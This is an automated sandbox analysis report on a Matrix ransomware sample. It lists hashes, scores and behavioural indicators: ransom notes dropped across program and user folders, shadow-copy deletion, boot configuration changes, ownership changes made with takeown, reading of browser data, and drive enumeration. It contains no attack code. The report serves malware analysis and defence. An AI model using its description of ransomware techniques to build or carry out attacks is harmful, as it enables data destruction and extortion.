matrix | fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e

Analysis

max time kernel
113s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-en-20220112
submitted
06-03-2022 06:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
Size

1.2MB
MD5

a9e9e5f3136061ae2bfbde287bc2872c
SHA1

bf02ff4f8c5f1b4780b9b82ab8b1a8f8451749d6
SHA256

fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e
SHA512

728a9e4118858f58a12cda88ece80bd671082ac2d936b8b087193e0a801b8c51ba15205c2d75ef2ec9a551a0dd6feee7c80ab2419a368e40af39249ed4370cd2

Score

10^/10

matrix discovery evasion persistence ransomware spyware stealer upx

Malware Config

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

description	ioc	Process
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\nb-no\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\en-il\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files\VideoLAN\VLC\lua\modules\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\cs-cz\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fr-ma\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sk-sk\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-gb\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files\Java\jre1.8.0_66\lib\cmm\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\cs-cz\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nb-no\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sv-se\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.People_8wekyb3d8bbwe\Settings\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\nb-no\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\tr-tr\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Google\Update\Install\{D36A04EE-33F2-4199-8863-BB9931AE6C74}\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Credentials\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-il\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files\Java\jre1.8.0_66\bin\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sl-sl\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hr-hr\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\nb-no\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\en-gb\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\pl-pl\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\uk-ua\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\zh-cn\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Users\All Users\Microsoft\DiagnosticLogCSP\Collectors\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\css\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\da-dk\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ko-kr\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sv-se\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\tr-tr\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-il\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fi-fi\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pl-pl\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\nb-no\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mr\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ro-ro\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\uk-ua\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\nb-no\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Users\Admin\Favorites\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\libs\require\2.1.15\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\de-de\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\uk-ua\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\uk-ua\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ja-jp\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
2520	bcdedit.exe
2740	bcdedit.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	TaBI95AQ64.exe

Executes dropped EXE 64 IoCs

pid	Process
4020	NW6IMq61.exe
392	TaBI95AQ.exe
2024	TaBI95AQ64.exe
3304	TaBI95AQ.exe
1128	TaBI95AQ.exe
3464	TaBI95AQ.exe
3860	TaBI95AQ.exe
2992	TaBI95AQ.exe
2484	TaBI95AQ.exe
3752	TaBI95AQ.exe
3840	TaBI95AQ.exe
2596	TaBI95AQ.exe
2636	TaBI95AQ.exe
628	TaBI95AQ.exe
2516	TaBI95AQ.exe
3784	TaBI95AQ.exe
2788	TaBI95AQ.exe
2964	TaBI95AQ.exe
3920	TaBI95AQ.exe
3148	TaBI95AQ.exe
3144	TaBI95AQ.exe
1420	TaBI95AQ.exe
3124	TaBI95AQ.exe
3524	TaBI95AQ.exe
756	TaBI95AQ.exe
2484	TaBI95AQ.exe
1436	TaBI95AQ.exe
2448	TaBI95AQ.exe
1152	TaBI95AQ.exe
2596	TaBI95AQ.exe
420	TaBI95AQ.exe
3120	TaBI95AQ.exe
628	TaBI95AQ.exe
2788	TaBI95AQ.exe
3828	TaBI95AQ.exe
3524	TaBI95AQ.exe
2516	TaBI95AQ.exe
3784	TaBI95AQ.exe
2856	TaBI95AQ.exe
3124	TaBI95AQ.exe
4012	TaBI95AQ.exe
2636	TaBI95AQ.exe
2892	TaBI95AQ.exe
3936	TaBI95AQ.exe
3520	TaBI95AQ.exe
2500	TaBI95AQ.exe
3388	TaBI95AQ.exe
2688	TaBI95AQ.exe
1788	TaBI95AQ.exe
940	TaBI95AQ.exe
2380	TaBI95AQ.exe
1928	TaBI95AQ.exe
1436	TaBI95AQ.exe
2516	TaBI95AQ.exe
2992	TaBI95AQ.exe
3932	TaBI95AQ.exe
1656	TaBI95AQ.exe
3860	TaBI95AQ.exe
1096	TaBI95AQ.exe
3524	TaBI95AQ.exe
1604	TaBI95AQ.exe
3240	TaBI95AQ.exe
4012	TaBI95AQ.exe
1532	TaBI95AQ.exe

Sets service image path in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 58 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0006000000022136-133.dat	upx
behavioral2/files/0x0006000000022136-134.dat	upx
behavioral2/files/0x0006000000022136-138.dat	upx
behavioral2/files/0x0006000000022136-139.dat	upx
behavioral2/files/0x0006000000022136-140.dat	upx
behavioral2/files/0x0006000000022136-141.dat	upx
behavioral2/files/0x0006000000022136-142.dat	upx
behavioral2/files/0x0006000000022136-143.dat	upx
behavioral2/files/0x0006000000022136-144.dat	upx
behavioral2/files/0x0006000000022136-145.dat	upx
behavioral2/files/0x0006000000022136-146.dat	upx
behavioral2/files/0x0006000000022136-147.dat	upx
behavioral2/files/0x0006000000022136-148.dat	upx
behavioral2/files/0x0006000000022136-149.dat	upx
behavioral2/files/0x0006000000022136-150.dat	upx
behavioral2/files/0x0006000000022136-151.dat	upx
behavioral2/files/0x0006000000022136-152.dat	upx
behavioral2/files/0x0006000000022136-153.dat	upx
behavioral2/files/0x0006000000022136-154.dat	upx
behavioral2/files/0x0006000000022136-155.dat	upx
behavioral2/files/0x0006000000022136-156.dat	upx
behavioral2/files/0x0006000000022136-157.dat	upx
behavioral2/files/0x0006000000022136-158.dat	upx
behavioral2/files/0x0006000000022136-159.dat	upx
behavioral2/files/0x0006000000022136-160.dat	upx
behavioral2/files/0x0006000000022136-161.dat	upx
behavioral2/files/0x0006000000022136-162.dat	upx
behavioral2/files/0x0006000000022136-163.dat	upx
behavioral2/files/0x0006000000022136-164.dat	upx
behavioral2/files/0x0006000000022136-165.dat	upx
behavioral2/files/0x0006000000022136-166.dat	upx
behavioral2/files/0x0006000000022136-167.dat	upx
behavioral2/files/0x0006000000022136-168.dat	upx
behavioral2/files/0x0006000000022136-169.dat	upx
behavioral2/files/0x0006000000022136-170.dat	upx
behavioral2/files/0x0006000000022136-171.dat	upx
behavioral2/files/0x0006000000022136-172.dat	upx
behavioral2/files/0x0006000000022136-173.dat	upx
behavioral2/files/0x0006000000022136-174.dat	upx
behavioral2/files/0x0006000000022136-175.dat	upx
behavioral2/files/0x0006000000022136-176.dat	upx
behavioral2/files/0x0006000000022136-177.dat	upx
behavioral2/files/0x0006000000022136-178.dat	upx
behavioral2/files/0x0006000000022136-179.dat	upx
behavioral2/files/0x0006000000022136-180.dat	upx
behavioral2/files/0x0006000000022136-181.dat	upx
behavioral2/files/0x0006000000022136-182.dat	upx
behavioral2/files/0x0006000000022136-183.dat	upx
behavioral2/files/0x0006000000022136-184.dat	upx
behavioral2/files/0x0006000000022136-185.dat	upx
behavioral2/files/0x0006000000022136-186.dat	upx
behavioral2/files/0x0006000000022136-187.dat	upx
behavioral2/files/0x0006000000022136-188.dat	upx
behavioral2/files/0x0006000000022136-189.dat	upx
behavioral2/files/0x0006000000022136-190.dat	upx
behavioral2/files/0x0006000000022136-191.dat	upx
behavioral2/files/0x0006000000022136-192.dat	upx
behavioral2/files/0x0006000000022136-193.dat	upx

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	wscript.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2688	takeown.exe
544	takeown.exe
1516	takeown.exe
2500	takeown.exe
2688	takeown.exe
3816	takeown.exe
3164	takeown.exe
3204	takeown.exe
2988	takeown.exe
1932	takeown.exe
2448	takeown.exe
2876	takeown.exe
3912	takeown.exe
2520	takeown.exe
2684	takeown.exe
1428	takeown.exe
2004	takeown.exe
3948	takeown.exe
3204	takeown.exe
556	takeown.exe
892	takeown.exe
1404	takeown.exe
2792	takeown.exe
540	takeown.exe
2788	takeown.exe
3936	takeown.exe
2856	takeown.exe
1112	takeown.exe
3416	takeown.exe
3776	takeown.exe
1684	takeown.exe
3556	takeown.exe
2684	takeown.exe
3108	takeown.exe
940	takeown.exe
384	takeown.exe
764	takeown.exe
3940	takeown.exe
2520	takeown.exe
2812	takeown.exe
3920	takeown.exe
264	takeown.exe
2988	takeown.exe
940	takeown.exe
2964	takeown.exe
3308	takeown.exe
2792	takeown.exe
1228	takeown.exe
3144	takeown.exe
316	takeown.exe
1420	takeown.exe
3240	takeown.exe
2104	takeown.exe
1112	takeown.exe
540	takeown.exe
3940	takeown.exe
1200	takeown.exe
1928	takeown.exe
2004	takeown.exe
2788	takeown.exe
3788	takeown.exe
1684	takeown.exe
2448	takeown.exe
3696	takeown.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Drops desktop.ini file(s) 27 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files\desktop.ini	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Users\Public\desktop.ini	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Users\Admin\3D Objects\desktop.ini	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\Y:	TaBI95AQ64.exe
File opened (read-only)	\??\V:	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened (read-only)	\??\K:	TaBI95AQ64.exe
File opened (read-only)	\??\P:	TaBI95AQ64.exe
File opened (read-only)	\??\H:	TaBI95AQ64.exe
File opened (read-only)	\??\R:	TaBI95AQ64.exe
File opened (read-only)	\??\R:	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened (read-only)	\??\I:	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened (read-only)	\??\H:	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened (read-only)	\??\J:	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened (read-only)	\??\F:	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened (read-only)	\??\B:	TaBI95AQ64.exe
File opened (read-only)	\??\E:	TaBI95AQ64.exe
File opened (read-only)	\??\J:	TaBI95AQ64.exe
File opened (read-only)	\??\O:	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened (read-only)	\??\L:	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened (read-only)	\??\K:	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
